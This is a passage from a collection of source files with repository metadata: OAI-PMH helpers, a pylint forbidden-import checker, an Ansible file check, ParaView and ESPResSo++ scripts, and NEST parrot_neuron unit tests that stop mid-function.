ent.addAdditionalFields('bookmark#','Bookmark','',"1")
elif "cannot" in ping_output:
ent.addAdditionalFields('bookmark#','Bookmark','',"4")
except subprocess.CalledProcessError, e:
ent.addAdditionalFields('bookmark#','Bookmark','',"4")
else:
pass
# Return Maltego Output
me.returnOutput()
|
brianwarehime/munk
|
transforms/listhostsourcetype.py
|
Python
|
gpl-2.0
| 3,584
|
[
"Brian"
] |
febe9ee4159e7a4825b0330a0106a2380374241b50cb636fc9d6fd1579da4da0
|
"""
A set of useful functions for working with OAI-PMH data
"""
from datetime import datetime
import base64, json
from octopus.core import app
class DateFormat(object):
"""
Class which helps us manage the date formats allowed by the standard
"""
@classmethod
def granularity(cls):
"""
What is the date granularity of the service
:return: The date granularity
"""
return "YYYY-MM-DDThh:mm:ssZ"
@classmethod
def default_earliest(cls):
"""
What is the earliest date, if no other date is available
:return: default earliest date (start of unix epoch)
"""
return "1970-01-01T00:00:00Z"
@classmethod
def now(cls):
"""
String representation of current timestamp
:return: string timestamp
"""
return datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
@classmethod
def format(cls, date):
"""
Format the given datestamp to the correct OAI-PMH date format
:param date: datestamp
:return: string
"""
return date.strftime("%Y-%m-%dT%H:%M:%SZ")
@classmethod
def legitimate_granularity(cls, datestr):
"""
Check whether the supplied date is of an allowed granularity
:param datestr: the supplied date
:return: True if allowed, False if not
"""
formats = ["%Y-%m-%d", "%Y-%m-%dT%H:%M:%SZ"]
success = False
for f in formats:
try:
datetime.strptime(datestr, f)
success = True
break
except Exception:
pass
return success
def make_set_spec(setspec):
"""
Convert the setspec into something that can be included in a ListSets response
:param setspec: the name of the set
:return: the encoded name of the set
"""
return base64.urlsafe_b64encode(setspec).replace("=", "~")
def decode_set_spec(setspec):
"""
Decode the setspec into something usable by the system
:param setspec: the encoded name of the set
:return: the decoded name of the set
"""
return base64.urlsafe_b64decode(str(setspec).replace("~", "="))
def make_resumption_token(metadata_prefix=None, from_date=None, until_date=None, oai_set=None, start_number=None):
"""
Create a resumption token that can represent the supplied request parameters
:param metadata_prefix: the metadata prefix of the request
:param from_date: the from date of the request
:param until_date: the until date of the request
:param oai_set: the oai set name of the request
:param start_number: the start number for the record cursor
:return: an encoded resumption token suitable for providing the page of results from the parameters
"""
d = {}
if metadata_prefix is not None:
d["m"] = metadata_prefix
if from_date is not None:
d["f"] = from_date
if until_date is not None:
d["u"] = until_date
if oai_set is not None:
d["s"] = oai_set
if start_number is not None:
d["n"] = start_number
j = json.dumps(d)
b = base64.urlsafe_b64encode(j)
return b
class ResumptionTokenException(Exception):
"""
Exception class for any issues with Resumption Tokens
"""
pass
def decode_resumption_token(resumption_token):
"""
Take the encoded resumption token, and convert it back into a set of parameters suitable for
use as **kwargs
:param resumption_token: the resumption token from the request
:return: dict containing the parameters of the request
"""
# attempt to parse the resumption token out of base64 encoding and as a json object
try:
j = base64.urlsafe_b64decode(str(resumption_token))
except TypeError:
raise ResumptionTokenException()
try:
d = json.loads(j)
except ValueError:
raise ResumptionTokenException()
# if we succeed read out the parameters
params = {}
if "m" in d: params["metadata_prefix"] = d.get("m")
if "f" in d: params["from_date"] = d.get("f")
if "u" in d: params["until_date"] = d.get("u")
if "s" in d: params["oai_set"] = d.get("s")
if "n" in d: params["start_number"] = d.get("n")
return params
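# Minimal round-trip sketch (Python 2, values illustrative): encoding request
# parameters into a resumption token and decoding them back is lossless.
#
# token = make_resumption_token(metadata_prefix="oai_dc", start_number=100)
# assert decode_resumption_token(token) == {"metadata_prefix": "oai_dc",
# "start_number": 100}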
def make_oai_identifier(identifier, qualifier):
"""
Make a suitable tag identifier for records in the OAI response.
Identifiers are of the form:
::
oai:[namespace]/[qualifier]:[identifier]
Namespace is taken from configuration (OAIPMH_IDENTIFIER_NAMESPACE)
:param identifier: the system identifier to incorporate
:param qualifier: the qualifier for the identifier
:return:
"""
return "oai:" + app.config.get("OAIPMH_IDENTIFIER_NAMESPACE") + "/" + qualifier + ":" + identifier
def extract_internal_id(oai_identifier):
"""
Extract the internal identifier from the full tag identifier from the OAI request
:param oai_identifier: the full OAI identifier for a record
:return: the internal identifier
"""
# most of the identifier is for show - we only care about the hex string at the end
return oai_identifier.split(":")[-1]
def get_response_date():
"""
Date of response to include in responses
:return: the current time, correctly formatted
"""
# return datetime.now().strftime("%Y-%m-%dT%H:%M:%SZ")
return DateFormat.now()
def normalise_date(date):
"""
Normalise the date provided into something we can use
:param date: the supplied date
:return: the normalised date
"""
# FIXME: do we need a more powerful date normalisation routine?
try:
datetime.strptime(date, "%Y-%m-%dT%H:%M:%SZ")
return date
except ValueError:
return "T".join(date.split(" ")) + "Z"
|
JiscPER/jper-oaipmh
|
service/oaitools.py
|
Python
|
apache-2.0
| 5,812
|
[
"Octopus"
] |
aac08dd22613fdd3c4fb090060fd40892b34763724bfb2754c0850969259a033
|
# Transformer/Framework/BatchIO.py
# -------
# Imports
# -------
import os;
import warnings;
from Transformer.IO import StructureSetIO;
# -----------------------------
# Batch Import/Export Functions
# -----------------------------
def ExportResultSet(resultSet, fileFormat = 'vasp', prefix = None, archiveDirectory = "./", atomicSymbolLookupTable = None, **kwargs):
# Set up a generator.
generator = ExportResultSetPassthrough(
resultSet, fileFormat = fileFormat, prefix = prefix, archiveDirectory = archiveDirectory, atomicSymbolLookupTable = atomicSymbolLookupTable, **kwargs
);
# Run the generator to output the structure sets, but do nothing with the yield values.
for _ in generator:
pass;
def ExportResultSetPassthrough(resultSetGenerator, fileFormat = 'vasp', prefix = None, archiveDirectory = "./", atomicSymbolLookupTable = None, **kwargs):
# prefix should not contain underscores; if it does, issue a warning and replace them with hyphens.
if prefix != None:
if '_' in prefix:
warnings.warn("Underscores in prefix will be converted to hyphens.", UserWarning);
prefix = prefix.replace('_', '-');
# If archiveDirectory does not exist, create it.
if not os.path.isdir(archiveDirectory):
os.makedirs(archiveDirectory);
# Loop over structure sets in the result set.
for i, structureSet in enumerate(resultSetGenerator):
# Determine a chemical formula.
chemicalFormula = None;
# We assume here that the supplied resultSet has come from one of the routines in this module, and thus that all structures in each set of spacegroup groups have the same composition.
spacegroupGroups = structureSet.GetStructureSet();
for structures, degeneracies in spacegroupGroups.values():
chemicalFormula = structures[0].GetChemicalFormula(atomicSymbolLookupTable = atomicSymbolLookupTable);
break;
# Build a name for the archive.
# If a prefix has been set, start with that.
archiveName = "{0}_".format(prefix) if prefix != None else "";
# Add the substitution number to the name.
archiveName = archiveName + "{0:0>3}_".format(i + 1);
# Finally, append the chemical formula and the file extension.
archiveName = archiveName + chemicalFormula + ".tar.gz";
# Export the structure set.
StructureSetIO.ExportStructureSet(
structureSet, os.path.join(archiveDirectory, archiveName), fileFormat = fileFormat, atomicSymbolLookupTable = atomicSymbolLookupTable, **kwargs
);
# Yield the structure set back to the caller.
yield structureSet;
def ImportResultSet(prefix = None, archiveDirectory = "./", **kwargs):
# If prefix is supplied, underscores are converted to hyphens, if present, to mirror ExportResultSetPassthrough().
if prefix != None:
if '_' in prefix:
warnings.warn("Underscores in prefix will be converted to hyphens.", UserWarning);
prefix = prefix.replace('_', '-');
# Search archiveDirectory for .tar.gz files.
inputFiles = [];
for entry in os.listdir(archiveDirectory):
absPath = os.path.join(archiveDirectory, entry);
if os.path.isfile(absPath):
if entry[-7:].lower() == ".tar.gz":
inputFiles.append(entry);
# Attempt to parse the file names and group them into result sets.
resultSetGroups = { };
# The format of the file names saved by ExportResultSet is "[<prefix>_]<number>_<chemical_formula>.tar.gz".
for archiveFile in inputFiles:
# Trim the .tar.gz extension and split at the underscore character.
components = archiveFile[:-7].split('_');
archivePrefix, archiveNumber, archiveChemicalFormula = None, None, None;
if len(components) == 2:
if components[0].isdigit():
# Two elements -> archive number + chemical formula.
archiveNumber = int(components[0]);
archiveChemicalFormula = components[1];
else:
continue;
elif len(components) == 3:
if components[1].isdigit():
# Three elements -> archive prefix, number and chemical formula.
archivePrefix = components[0];
archiveNumber = int(components[1]);
archiveChemicalFormula = components[2];
else:
continue;
else:
continue;
# Add prefix to resultSets if required.
if archivePrefix not in resultSetGroups:
resultSetGroups[archivePrefix] = { };
# Set a key from the archive number and chemical formula.
key = (archiveNumber, archiveChemicalFormula);
# If the key is already present, it means archiveDirectory contains archives of multiple result sets that can't be separated.
if key in resultSetGroups[archivePrefix]:
# If a prefix was not supplied, or the archive prefix is equal to the target prefix, we cannot work out what to do without user input -> throw an error.
if prefix == None or archivePrefix == prefix:
raise Exception("Error: Multiple result sets in archive directory \"{0}\" cannot be separated - please specify the prefix manually or remove unwanted result sets.".format(archiveDirectory));
resultSetGroups[archivePrefix][key] = archiveFile;
# Check result sets were found.
if len(resultSetGroups) == 0:
raise Exception("Error: No result set archives found in archive directory \"{0}\".".format(archiveDirectory));
if prefix != None:
# If prefix is specified, check archives with that prefix were found.
if prefix not in resultSetGroups:
raise Exception("Error: Archive files with the prefix \"{0}\" were not found in archive directory \"{1}\".".format(prefix, archiveDirectory));
else:
# If not, check we only found archives with one prefix.
if len(resultSetGroups) > 1:
raise Exception("Error: Result set archives with multiple prefixes were found in archive directory \"{0}\" - please specify a prefix via the prefix keyword.".format(archiveDirectory));
prefix = None;
for key in resultSetGroups.keys():
prefix = key;
break;
# Finally, check the group does not contain archives with the same number but different chemical formulae, and that the result sets are numbered sequentially from 1.
resultSetGroup = resultSetGroups[prefix];
archiveNumbers = [];
for archiveNumber, _ in resultSetGroup.keys():
if archiveNumber in archiveNumbers:
raise Exception("Error: Archive directory \"{0}\" appears to contain multiple sets of results with the same prefix - please check.".format(archiveDirectory));
archiveNumbers.append(archiveNumber);
archiveNumbers.sort();
for i in range(0, len(archiveNumbers)):
if archiveNumbers[i] != i + 1:
raise Exception("Error: Archives appear to be missing from the specified result set in archive directory \"{0}\".".format(archiveDirectory));
# Read archives.
resultSet = [
StructureSetIO.ImportStructureSet(os.path.join(archiveDirectory, resultSetGroup[key]), **kwargs)
for key in sorted(resultSetGroup.keys(), key = lambda item : item[0])
];
# Return result set.
return resultSet;
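# Usage sketch (hypothetical prefix/directory; assumes a result set produced
# by the routines in this package):
#
# ExportResultSet(resultSet, prefix = "Demo", archiveDirectory = "./Results");
# roundTrip = ImportResultSet(prefix = "Demo", archiveDirectory = "./Results");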
|
JMSkelton/Transformer
|
Transformer/Framework/BatchIO.py
|
Python
|
gpl-3.0
| 7,480
|
[
"VASP"
] |
a748d2a7c90c842df09297e72fc8fb40d1fca2dfd2d98392fe3435cfc684f8ac
|
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
**************************************************************
**espressopp.interaction.DihedralHarmonicUniqueCos**
**************************************************************
.. math::
U = K (\cos(\phi) - \cos(\phi_0))^2
.. function:: espressopp.interaction.DihedralHarmonicUniqueCos(K)
:param K: (default: 0.0)
:type K: real
.. function:: espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCos(system, fqal, potential)
:param system:
:param fqal:
:param potential:
:type system:
:type fqal:
:type potential:
.. function:: espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCos.getFixedQuadrupleList()
:rtype: A Python list of lists.
.. function:: espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCos.setPotential(potential)
:param potential:
:type potential:
"""
from espressopp import pmi
from espressopp.esutil import *
from espressopp.interaction.DihedralUniquePotential import *
from espressopp.interaction.Interaction import *
from _espressopp import interaction_DihedralHarmonicUniqueCos, \
interaction_FixedQuadrupleAngleListDihedralHarmonicUniqueCos
class DihedralHarmonicUniqueCosLocal(DihedralUniquePotentialLocal, interaction_DihedralHarmonicUniqueCos):
def __init__(self, K=0.0):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, interaction_DihedralHarmonicUniqueCos, K)
class FixedQuadrupleAngleListDihedralHarmonicUniqueCosLocal(InteractionLocal, interaction_FixedQuadrupleAngleListDihedralHarmonicUniqueCos):
def __init__(self, system, fqal, potential):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, interaction_FixedQuadrupleAngleListDihedralHarmonicUniqueCos, system, fqal, potential)
def setPotential(self, potential):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
self.cxxclass.setPotential(self, potential)
def getFixedQuadrupleList(self):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
return self.cxxclass.getFixedQuadrupleAngleList(self)
if pmi.isController:
class DihedralHarmonicUniqueCos(DihedralUniquePotential):
'The DihedralHarmonicUniqueCos potential.'
pmiproxydefs = dict(
cls = 'espressopp.interaction.DihedralHarmonicUniqueCosLocal',
pmiproperty = ['K']
)
class FixedQuadrupleAngleListDihedralHarmonicUniqueCos(Interaction):
__metaclass__ = pmi.Proxy
pmiproxydefs = dict(
cls = 'espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCosLocal',
pmicall = ['setPotential', 'getFixedQuadrupleList']
)
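# Usage sketch (assumes a configured espressopp system and a fixed
# quadruple-angle list fqal; the names are illustrative):
#
# pot = espressopp.interaction.DihedralHarmonicUniqueCos(K=1.5)
# inter = espressopp.interaction.FixedQuadrupleAngleListDihedralHarmonicUniqueCos(system, fqal, pot)
# system.addInteraction(inter)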
|
capoe/espressopp.soap
|
src/interaction/DihedralHarmonicUniqueCos.py
|
Python
|
gpl-3.0
| 3,722
|
[
"ESPResSo"
] |
017f475499e2b435bb01d3c34e93eaa9e6dc7ce79c9989eaa7350b1b613bb347
|
import astroid
import inspect
from pylint.interfaces import IAstroidChecker
from pylint.checkers import BaseChecker
from pylint.checkers.utils import check_messages
class ForbiddenImportChecker(BaseChecker):
__implements__ = IAstroidChecker
name = 'forbidden_import'
msgs = {'E9999':
('You may not import any modules - you imported %s on line %s.',
'forbidden-import',
'Used when you use import')}
options = (('allowed-import-modules',
{'default': (),
'type': 'csv',
'metavar': '<modules>',
'help': 'Allowed modules to be imported.'}
),
('extra-imports',
{'default': (),
'type': 'csv',
'metavar': '<extra-modules>',
'help': 'Extra allowed modules to be imported.'}
)
)
# this is important so that your checker is executed before others
priority = -1
@check_messages("forbidden-import")
def visit_import(self, node):
"""visit an Import node"""
temp = [name for name in node.names
if name[0] not in self.config.allowed_import_modules and
name[0] not in self.config.extra_imports]
if temp:
self.add_message(
'forbidden-import', node=node,
args=(', '.join(map(lambda x: x[0], temp)), node.lineno))
@check_messages("forbidden-import")
def visit_importfrom(self, node):
"""visit an ImportFrom node"""
if node.modname not in self.config.allowed_import_modules and\
node.modname not in self.config.extra_imports:
self.add_message(
'forbidden-import', node=node,
args=(node.modname, node.lineno))
@check_messages("forbidden-import")
def visit_call(self, node):
if isinstance(node.func, astroid.Name):
name = node.func.name
# ignore the name if it's not a builtin (i.e. not defined in the
# locals nor globals scope)
if not (name in node.frame() or name in node.root()):
if name == "__import__":
if node.args[0].value not in self.config.allowed_import_modules and\
node.args[0].value not in self.config.extra_imports:
args = (node.args[0].value, node.lineno)
# add the message
self.add_message('forbidden-import', node=node,
args=args)
def register(linter):
"""required method to auto register this checker"""
linter.register_checker(ForbiddenImportChecker(linter))
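# Usage sketch: pylint discovers this checker through register() when the
# module is loaded as a plugin, e.g. (module path taken from this file's
# location, assuming it is importable; the target file is hypothetical):
#
# pylint --load-plugins=python_ta.checkers.forbidden_import_checker \
# --allowed-import-modules=math,typing target.py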
|
RyanDJLee/pyta
|
python_ta/checkers/forbidden_import_checker.py
|
Python
|
gpl-3.0
| 2,792
|
[
"VisIt"
] |
b6c31168ba0fd299f2d954df27c718bd0375029e3e9fb2ad3313e6d9abbaf483
|
#!/usr/bin/env python
"""Prevent unwanted files from being added to the source tree."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import sys
def main():
"""Main entry point."""
paths = sys.argv[1:] or sys.stdin.read().splitlines()
allowed_extensions = (
'.cs',
'.ps1',
'.psm1',
'.py',
)
skip_paths = set([
'lib/ansible/config/ansible_builtin_runtime.yml', # not included in the sanity ignore file since it won't exist until after migration
])
skip_directories = (
'lib/ansible/galaxy/data/',
)
for path in paths:
if path in skip_paths:
continue
if any(path.startswith(skip_directory) for skip_directory in skip_directories):
continue
if path.startswith('lib/') and not path.startswith('lib/ansible/'):
print('%s: all "lib" content must reside in the "lib/ansible" directory' % path)
continue
ext = os.path.splitext(path)[1]
if ext not in allowed_extensions:
print('%s: extension must be one of: %s' % (path, ', '.join(allowed_extensions)))
if __name__ == '__main__':
main()
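# Usage sketch: paths come from argv or stdin, so an (illustrative)
# pre-commit style pipeline works:
#
# git diff --cached --name-only | python no-unwanted-files.py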
|
maxamillion/ansible
|
test/sanity/code-smell/no-unwanted-files.py
|
Python
|
gpl-3.0
| 1,232
|
[
"Galaxy"
] |
590d5aa0f80bddccecd0f73624023354462a3457966e29f8c9eafaf383a83ddf
|
#!/usr/bin/python
#FILE DESCRIPTION=======================================================
#~ Python script used for post-processing automation of flow on an
#~ inclined (?textured?) plate (minimal postprocessing to test the results)
#~
#~ NOTES:
#~ - still unfinished, but an improvement
#~ USAGE:
#~ paraFoam --script=./postProcMinimal.py
#LICENSE================================================================
# postProcMinimal.py
#
# Copyright 2015 Martin Isoz <martin@Poctar>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
# PARAMETERS============================================================
xAll = 0.025
ySkip= 0.07
# POSTPROCESSING INITIATION=============================================
import glob
mainCase = glob.glob('./*.OpenFOAM') #works only for the cases with 1 foam file
paraview.simple._DisableFirstRenderCameraReset()
activeSource_OpenFOAM = GetActiveSource()
# enable all available fields
activeSource_OpenFOAM.VolumeFields = ['alpha.liquid', 'p_rgh', 'U']
# show all for internal mesh
activeSource_OpenFOAM.MeshParts = ['internalMesh']
# I don't want to see the main mesh / I do want to see it as a transparent wireframe
allIntMeshRepresentation = GetDisplayProperties( activeSource_OpenFOAM )
allIntMeshRepresentation.Visibility = 0
allIntMeshRepresentation.Representation = 'Wireframe'
allIntMeshRepresentation.Opacity = 0.1
# set up black background (seems prettier)
RenderView1 = GetRenderView()
RenderView1.UseTexturedBackground = 0
RenderView1.Background = [0.0, 0.0, 0.0]
activeSource_OpenFOAM = FindSource( mainCase[0] )
# CREATE A SCALAR CLIP - SHOW ONLY THE RIVULET==========================
liqOnly = Clip( ClipType="Scalar", guiName="liqOnly" )
liqOnly.Scalars = ['POINTS', 'alpha.liquid']
liqOnly.Value = 0.5
liqOnlyRepresentation = Show()
liqOnlyRepresentation.Representation = 'Surface'
liqOnlyRepresentation.Visibility = 0
# COLOR THE FILM BY FILM THICKNESS (CALCULATOR+PROPER COLORING)=========
fThCalc = Calculator( guiName="fThCalc" )
fThCalc.Function = 'coordsZ'
fThCalc.ResultArrayName = 'hFun'
fThCalcRepresentation = Show()
fThCalcRepresentation.Visibility = 1
# SCALAR BAR============================================================
# ADD CASE TITLE========================================================
# ADD ANOTATE TIME SOURCE===============================================
annotTime = AnnotateTime()
annotTimeRepresentation = Show()
annotTime.Format = '$\mathrm{Time:\,%5.2f\,s}$'
annotTimeRepresentation.FontFamily = 'Courier'
annotTimeRepresentation.Position = [xAll, 0.025]
annotTimeRepresentation.Visibility = 1
Render()
# POST RUNNING MODIFICATIONS============================================
AnimationScene1 = GetAnimationScene()
AnimationScene1.GoToLast()
Render()
# SCALAR BAR============================================================
source = fThCalc #where to get the data
data = source.GetPointDataInformation()
#get the array and the respective min-max
array = data.GetArray('hFun')
dataRange = array.GetRange(0) #-1 for magnitude
colorObjectRepresentation = fThCalcRepresentation #what object will be colored
a0_hFun_PVLookupTable = GetLookupTableForArray( "hFun", 0,
#~ RGBPoints=[0.0, 0.0, 0.0, 0.0, dataRange[1], 1.0, 1.0, 1.0], #grayscale coloring
#~ ColorSpace='RGB',
RGBPoints=[0.0, 0.0, 0.0, 1.0, dataRange[1], 1.0, 0.0, 0.0], #classical rainbow coloring
ColorSpace='HSV',
ScalarRangeInitialized=1.0 )
a0_hFun_PiecewiseFunction = CreatePiecewiseFunction( Points=[0.0, 0.0, 0.5, 0.0, 1.0, 1.0, 0.5, 0.0] )
colorObjectRepresentation.Representation = 'Surface'
colorObjectRepresentation.ColorArrayName = ('POINT_DATA', 'hFun')
colorObjectRepresentation.LookupTable = a0_hFun_PVLookupTable
a0_hFun_PVLookupTable.ScalarOpacityFunction = a0_hFun_PiecewiseFunction
Render()
ScalarBarWidgetRepresentation = CreateScalarBar( Title='$h(x,y),[\mathrm{m}]$',
ComponentTitle = '',
LabelFontSize = 12,
Enabled = 1,
LookupTable = a0_hFun_PVLookupTable,
TitleFontSize = 14,
AutomaticLabelFormat = 0,
LabelFormat = '$%-#5.2e$',
RangeLabelFormat = '$%-#5.2e$',
)
RenderView1.Representations.append(ScalarBarWidgetRepresentation)
Render()
# SET PROPER CAMERA POSITION============================================
ResetCamera()
RenderView1 = GetRenderView()
RenderView1.CameraViewUp = [-0.9, 0.03, 0.45]
RenderView1.CameraPosition = [0.38, 0.46, 0.42]
RenderView1.CameraFocalPoint = [0.145, 0.0, 0.0]
RenderView1.CameraParallelScale = 0.17
Render()
# LOAD THE CASE AGAIN TO DISPLAY THE CHANNEL============================
showWalls = PV4FoamReader(FileName=mainCase[0], guiName='showWalls')
showWalls.MeshParts = ['wall - group']
showWalls.VolumeFields = []
showWallsRepresentation = Show()
showWallsRepresentation.Representation = 'Surface'
showWallsRepresentation.Visibility = 1
showWallsRepresentation.DiffuseColor = [0.5529411764705883, 0.5529411764705883, 0.5529411764705883]
Render()
# ANIMATION SAVING (PURE IMAGES, NOT BLENDER)===========================
#~ eTime = float("%s"%AnimationScene1.GetProperty('Duration'))
#~
#~ AnimationScene1.GoToFirst()
#~ k = 0;
#~ cTime = float("%s"%AnimationScene1.GetProperty('AnimationTime'))
#~
#~ while (cTime < eTime):
#~ Render()
#~ #x3dExporter=exporters.X3DExporter(FileName='./x3dFiles/rivulet_%03d.x3d'% (k))
#~ #x3dExporter.SetView(GetActiveView()) # <===== NEW LINE
#~ #x3dExporter.Write()
#~ WriteImage('pvAnimation/plate_%03d.png'%k)
#~ AnimationScene1.GoToNext()
#~ k = k+1
#~ cTime = float("%s"%AnimationScene1.GetProperty('AnimationTime'))
|
MartinIsoz/CFD_oF
|
05_freibergExpSetUp/00_Scripts/postProcMinimalV2.py
|
Python
|
gpl-2.0
| 6,562
|
[
"ParaView"
] |
7a8ac627cc964966254a0962c1ccca54243f69b6d8837db1ec03f09ccc553f49
|
# -*- coding: utf-8 -*-
#
# test_parrot_neuron.py
#
# This file is part of NEST.
#
# Copyright (C) 2004 The NEST Initiative
#
# NEST is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
#
# NEST is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with NEST. If not, see <http://www.gnu.org/licenses/>.
# This script tests the parrot_neuron in NEST.
# See test_parrot_neuron_ps.py for an equivalent test of the precise parrot.
import nest
import unittest
import math
@nest.ll_api.check_stack
class ParrotNeuronTestCase(unittest.TestCase):
"""Check parrot_neuron spike repetition properties"""
def setUp(self):
nest.set_verbosity('M_WARNING')
nest.ResetKernel()
# set up source spike generator, as well as parrot neurons
self.spike_time = 1.
self.delay = .2
self.source = nest.Create("spike_generator", 1,
{"spike_times": [self.spike_time]})
self.parrot = nest.Create('parrot_neuron')
self.spikes = nest.Create("spike_recorder")
# record source and parrot spikes
nest.Connect(self.source, self.spikes)
nest.Connect(self.parrot, self.spikes)
def test_ParrotNeuronRepeatSpike(self):
"""Check parrot_neuron repeats spikes on port 0"""
# connect with arbitrary delay
nest.Connect(self.source, self.parrot, syn_spec={"delay": self.delay})
nest.Simulate(self.spike_time + 2 * self.delay)
# get spike from parrot neuron
events = nest.GetStatus(self.spikes)[0]["events"]
post_time = events['times'][
events['senders'] == self.parrot[0].get('global_id')]
# assert spike was repeated at correct time
assert post_time, "Parrot neuron failed to repeat spike."
assert self.spike_time + self.delay == post_time, \
"Parrot neuron repeated spike at wrong delay"
def test_ParrotNeuronIgnoreSpike(self):
"""Check parrot_neuron ignores spikes on port 1"""
# connect with arbitrary delay to port 1
nest.Connect(self.source, self.parrot,
syn_spec={"receptor_type": 1, "delay": self.delay})
nest.Simulate(self.spike_time + 2. * self.delay)
# get spike from parrot neuron, assert it was ignored
events = nest.GetStatus(self.spikes)[0]["events"]
post_time = events['times'][
events['senders'] == self.parrot.get('global_id')]
assert len(post_time) == 0, \
"Parrot neuron failed to ignore spike arriving on port 1"
def test_ParrotNeuronOutgoingMultiplicity(self):
"""
Check parrot_neuron correctly repeats multiple spikes
The parrot_neuron receives two spikes in a single time step.
We check that both spikes are forwarded to the spike_recorder.
"""
# connect twice
nest.Connect(self.source, self.parrot, syn_spec={"delay": self.delay})
nest.Connect(self.source, self.parrot, syn_spec={"delay": self.delay})
nest.Simulate(self.spike_time + 2. * self.delay)
# get spikes from parrot neuron, assert two were transmitted
events = nest.GetStatus(self.spikes)[0]["events"]
post_times = events['times'][
events['senders'] == self.parrot.get('global_id')]
assert len(post_times) == 2 and post_times[0] == post_times[1], \
"Parrot neuron failed to correctly repeat multiple spikes."
@nest.ll_api.check_stack
class ParrotNeuronPoissonTestCase(unittest.TestCase):
"""Check parrot_neuron spike repetition properties"""
def test_ParrotNeuronIncomingMultiplicity(self):
"""
Check parrot_neuron heeds multiplicity information in incoming spikes.
This test relies on the fact that poisson_generator transmits
multiple spikes during a time step using multiplicity, and that
these spikes are delivered directly, i.e., without multiplicity-
unrolling in send_remote().
We create a high-rate poisson_generator. If parrot_neuron
ignored multiplicity, it would only transmit one spike per time
step. We chain two parrot_neurons to check against any loss.
"""
# set up source spike generator, as well as parrot neurons
h = 0.1 # ms
rate = 1000000. # spikes / s
delay = 1. # ms
t_base = 1000. # ms
t_sim = t_base + 3 * delay # after t_sim, spikes from t_base arrived
spikes_expected = rate * t_base / 1000.
spikes_std = math.sqrt(spikes_expected)
# if the test is to be meaningful we must expect significantly more
# spikes than time steps
assert spikes_expected - 3 * spikes_std > 10. * t_sim / h, \
"Internal inconsistency: too few spikes."
nest.set_verbosity('M_WARNING')
nest.ResetKernel()
nest.SetKernelStatus({'resolution': h,
'grng_seed': 123,
'rng_seeds': [456]})
source = nest.Create('poisson_generator', params={'rate': rate})
parrots = nest.Create('parrot_neuron', 2)
spike_rec = nest.Create('spike_recorder')
nest.Connect(source, parrots[:1], syn_spec={'delay': delay})
nest.Connect(parrots[:1], parrots[1:], syn_spec={'delay': delay})
nest.Connect(parrots[1:], spike_rec)
nest.Simulate(t_sim)
n_spikes = nest.GetStatus(spike_rec)[0]['n_events']
assert n_spikes > spikes_expected - 3 * spikes_std, \
"parrot_neuron loses spikes."
assert n_spikes < spikes_expected + 3 * spikes_std, \
"parrot_neuron adds spikes."
@nest.ll_api.check_stack
class ParrotNeuronSTDPTestCase(unittest.TestCase):
"""
Check STDP protocol between two parrot_neurons connected by a stdp_synapse.
Exact pre- and postsynaptic spike times are set by spike_generators
connected to each parrot neuron. Additional spikes sent through the
stdp_synapse are explicitly ignored in the postsynaptic parrot_neuron
by setting the stdp_synapse to connect to port 1.
"""
def run_protocol(self, dt):
"""Set up a network with pre-post spike pairings
with t_post - t_pre = dt"""
nest.set_verbosity("M_WARNING")
nest.ResetKernel()
# set pre and postsynaptic spike times
delay = 1. # delay for connections
dspike = 100. # ISI
# set the correct real spike times for generators (correcting for
# delays)
pre_times = [100., 100. + dspike]
post_times = [k + dt for k in pre_times]
# create spike_generators with these times
pre_spikes = nest.Create("spike_generator", 1, {
"spike_times": pre_times})
post_spikes = nest.Create("spike_generator", 1, {
"spike_times": post_times})
# create parrot neurons and connect spike_generators
pre_parrot = nest.Create("parrot_neuron", 1)
post_parrot = nest.Create("parrot_neuron", 1)
nest.Connect(pre_spikes, pre_parrot, syn_spec={"delay": delay})
nest.Connect(post_spikes, post_parrot, syn_spec={"delay": delay})
# create spike recorder
spikes = nest.Create("spike_recorder")
nest.Connect(pre_parrot, spikes)
nest.Connect(post_parrot, spikes)
# connect both parrot neurons with a stdp synapse onto port 1
# thereby spikes transmitted through the stdp connection are
# not repeated postsynaptically.
syn_spec = {
"synapse_model": "stdp_synapse",
# set receptor 1 postsynaptically, to not generate extra spikes
"receptor_type": 1,
}
conn_spec = {
"rule": "one_to_one",
}
